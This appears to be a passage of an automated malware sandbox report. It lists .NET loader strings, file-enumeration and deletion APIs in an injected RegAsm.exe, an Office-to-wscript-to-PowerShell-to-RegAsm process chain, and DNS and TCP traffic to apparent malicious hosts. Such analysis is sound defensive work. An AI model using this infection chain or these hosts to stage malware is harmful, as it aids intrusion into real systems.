                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global traffic DNS query: name: zhort.de
                  Source: global traffic DNS query: name: ia803104.us.archive.org
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.12.81.228:80
                  Source: global traffic TCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
